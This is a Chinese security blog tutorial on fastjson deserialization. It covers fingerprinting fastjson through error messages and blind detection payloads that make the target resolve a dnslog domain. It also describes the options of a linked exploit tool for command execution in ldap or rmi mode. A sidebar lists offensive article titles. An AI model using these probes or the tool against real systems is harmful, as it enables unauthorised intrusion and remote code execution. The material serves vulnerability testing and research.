0x01 序章
上次讲解过手动利用fastjson,但讲的过于太简单了。根据大家的反应,收集如下几个问题。
1、如何盲打fastjson
2、判断fastjson的指纹
3、各版本payload以及使用ldap模式监听。
下面我就一一解答,我只是把我在网上查到的资料消化 后分享给大家,如果有大佬觉得哪里不对,还望不吝赐教。这次还带来了一键利用及检测工具,链接在文末。
注:本文仅用于技术讨论与研究,严禁用于任何违法用途,违者后果自负
0x02 环境搭建
这个不用多说了吧,使用vulhub搭建。
启动fastjson:1.2.24或者fastjson:1.2.45都可以。
判断fastjson:
无特殊配置情况下fastjson,无正确的闭合会报错,返回结果里有fastjson字样。
从上图可以看出,我们使用了一个花括号,fastjson处理json时会返回报错信息。
有的小伙伴就问了,如果是配置了不返回报错信息怎么办?那这种情况就只有利用dnslog盲打了。
这里有个小技巧就是,如果你批量检查或者自己的dnslog,里面有很多记录。你可以这样使用'baidu'.d1flzs.dnslog.cn,在dnslog前面加个名称
盲打payload:
1.2.67版本前
{"zeo":{"@type":"java.net.Inet4Address","val":"fatu5k.dnslog.cn"}}
1.2.67版本后payload
{"@type":"java.net.Inet4Address","val":"dnslog"}
{"@type":"java.net.Inet6Address","val":"dnslog"}
0x03 工具使用
下面讲解工具使用,这是通过GitHub上大佬工具改造的。
支持rmi及ldap两种模式
参数介绍:
-h, --help //查看帮助
-u, --url //漏洞url
-c, --commamd //执行命令
-m, --mode //选择执行模式(可选),1:ldap模式(默认);2:rmi模式
演示效果(dnslog):
演示效果(创建文件):
0x04 批量检测
工具链接:
https://github.com/mrknow001/fastjson_rec_exploit
猜你还喜欢
- 12-09Kali Linux字典生成工具Cewl使用全指南
- 01-12开源安全情报引擎Critical Stack使用入门
- 05-02分享一款基于Pocsuite的漏洞扫描系统
- 01-04经验分享 | Burpsuite抓取非HTTP流量
- 11-05工具分享 | Maltego4.0.11中文汉化版
- 05-02Burpsuit结合SQLMapAPI产生的批量注入插件
- 11-25工具 | 手把手教你信息收集之子域名收集器
- 05-30最新BurpSuite 1.7.32 破解版[注册机]下载【无后门版】
- 12-08burpsuite_pro_v1.7.11破解版(含下载地址)
- 03-28X Brute Forcer:一款小巧易用的CMS密码爆破工具
- 最新文章
- 随机文章
-
- 某司SSL-VPN沙盒逃逸之旅
- Mimikatz 非官方指南和命令参考_Part1
- Microsoft Outlook 漏洞:可允许远程代码执行
- 从TCL某漏洞看内网渗透教学分享之内网信息探测和后渗透准备
- 域渗透的金之钥匙
- 巧用DSRM密码同步将域控权限持久化
- Hash传递攻击Windows2012远程桌面
- 为指定用户添加Windows特权的代码
- 别以为有vpn我找不到你(网警抓人全过程)
- 内网渗透:利用WMI代替psexec(WMIEXEC.vbs)
- 域科普文:使用powershell管理域用户
- 详解Filezilla提权
- 适用于PHP初学者的学习线路和建议
- PHP开发规范
- 如何绕过安全狗waf这类的防护软件--PHP过狗一句话实例两枚+过狗详细分析讲解
- 漏洞挖掘经验分享
- 是什么让黑帽黑客成了白帽英雄
- phpcms_v9.6.0_sql注入与exp
- PHPcms9.6.0 最新版任意文件上传漏洞(直接getshell)
- 我为什么会热爱黑客技术
- 热门文章
-
- 九年专业安全团队承接渗透入侵维护服务
- Stuxnet纪录片-零日 Zero.Days (2016)【中文字幕】
- Emlog黑客站模板“Milw0rm”发布
- SQLMAP的注入命令以及使用方法
- 白帽故事汇:网络安全战士从来不是「男生」的专利
- 编辑器漏洞手册
- web安全之如何全面发现系统后台
- 常见Web源码泄露总结
- 深入理解JAVA反序列化漏洞
- cmseasy前台无需登录直接获取敏感数据的SQL注入(有POC证明)
- 网站后台登陆万能密码
- 黑客怎样简单入侵别人手机,黑客是如何入侵手机的?
- 黑麒麟2016渗透培训系列教程
- 破解emlog收费模板“Begin”
- 那些强悍的PHP一句话后门
- Android平台渗透测试套件zANTI v2.5发布(含详细说明)
- 渗透工具BackTrack与KaliLinux全套视频教程
- Python列为黑客应该学的四种编程语言之一 初学者该怎么学
- CVE-2017-11882漏洞复现和利用
- 恶意程序报告在线查询工具
- 文章标签
-